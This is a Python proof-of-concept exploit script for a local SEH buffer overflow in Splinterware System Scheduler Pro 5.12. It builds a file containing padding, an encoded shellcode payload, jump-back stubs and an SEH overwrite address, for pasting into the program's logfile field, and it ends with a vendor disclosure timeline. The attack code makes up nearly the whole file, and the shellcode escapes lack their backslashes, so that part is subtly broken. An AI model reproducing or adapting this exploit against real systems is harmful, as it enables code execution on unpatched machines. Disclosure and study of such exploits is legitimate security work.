#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Splinterware System Scheduler Pro 5.12 - Local Buffer Overflow (SEH)
# Date: 07-21-18
# Vulnerable Software: System Scheduler Pro 5.12
# Vendor Homepage: https://www.splinterware.com
# Version: 5.12
# Software Link: https://www.splinterware.com/download/ssproeval.exe
# Tested Windows 7 SP1 x86
#
#
#
# PoC
# 1. generate sysschedule512.txt, copy contents to clipboard
# 2. open application
# 3. select view, preferences and in the Startup/Logging tab
# 4. paste contents from clipboard to the logfile location field
# 5. exit preferences
# 6. create dummy task to open notepad.exe
# 7. run task, notepad opens
# 8. close notepad
# 9. pop-up window appears and application crashes



import struct

# --- PoC file generator ----------------------------------------------------
# Builds the contents of sysschedule512.txt as one string whose named segments
# are concatenated, in order, on the `buffer` line below. The vendor timeline
# at the end of this file records the issue as fixed in version 5.13; the
# script is kept as a historical record for triage and detection reference.

filename="sysschedule512.txt"  # output file written at the end of the script

# Leading padding: 55 'A' characters.
junk = "A"*55

#thx giuseppe d'amore for edb-id 28996; edited pop-up msg & encoded
#msfencode -e x86/alpha_mixed -i bzyo; size 287
# Author-attributed pop-up payload string; provenance and the encoder used are
# given in the two comment lines above. It is a single Python string literal
# split across several physical lines by implicit concatenation.
msg = ("x89xe5xdaxc4xd9x75xf4x5ax4ax4ax4ax4ax4ax4a"
"x4ax4ax4ax4ax4ax43x43x43x43x43x43x37x52x59"
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41"
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42"
"x75x4ax49x74x71x58x52x4cx72x30x30x52x44x6c"
"x4bx75x42x4cx4bx62x72x34x4cx4ex6bx30x52x45"
"x4cx6ex6bx73x72x56x68x6cx4bx64x32x31x30x6c"
"x4bx66x72x4dx50x33x4ex66x6cx50x33x32x55x39"
"x62x4fx79x6ax67x43x33x62x58x67x4cx6cx4bx56"
"x37x33x48x66x61x4ax62x4ex6bx51x6ax77x50x55"
"x51x49x57x66x51x58x6dx4ex6bx30x34x6cx6fx76"
"x61x69x56x57x35x4dx51x67x4ex31x56x35x31x74"
"x34x63x51x64x35x49x62x4fx71x43x4ex46x68x53"
"x75x53x48x71x79x64x34x30x75x5ax49x6cx4bx30"
"x7ax51x34x33x31x59x57x42x46x4cx4bx44x6cx50"
"x6fx4ex6bx52x5ax45x4cx65x51x4bx77x6ex6bx71"
"x6cx6ex4fx6bx4cx55x51x38x47x51x78x37x51x75"
"x71x37x51x76x61x65x38x71x52x61x4ax43x69x50"
"x4fx50x68x31x30x55x71x64x61x67x51x6dx59x48"
"x61x6bx4ex73x79x66x6bx44x71x6bx70x66x31x50"
"x50x49x6fx68x57x41x41")

# Second padding block: 56 'B' characters.
junk1 = "B"*56

#jmp back to As
# Segment the author describes as a jump back into the 'A' padding.
jmp3 = "xe9x6fxfexffxff"

# 4 'C' characters.
junk2= "C"*4

#jmp back after random 8 nulls added
# Short segment; its role is given by the author's comment above.
jmp2 = "xebxf5"

# 10 'C' characters.
junk3 = "C"*10

#jmp back before random 8 nulls added
# Short segment; its role is given by the author's comment above.
jmp = "xebxf2xccxcc"

# 4-byte little-endian value placed at the SEH-record position (per the
# variable name); struct.pack makes the byte order explicit.
seh = struct.pack('<L',0x00413121)

# Final file contents: every segment above, in exactly this order.
buffer = junk + msg + junk1 + jmp3 + junk2 + jmp2 + junk3 + jmp + seh

# Write the assembled string to disk in text mode; the handle is closed
# explicitly on the last line rather than via a `with` block.
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()

# Timeline
#---------------------------------------------------------------------
#05-02-18: Vendor notified of vulnerability
#05-03-18: Initial vendor response
#05-09-18: Issues resolved after some back and forth discussion
#07-20-18: New version released, 5.13, with issue fixed
#07-21-18: Submitted public disclosure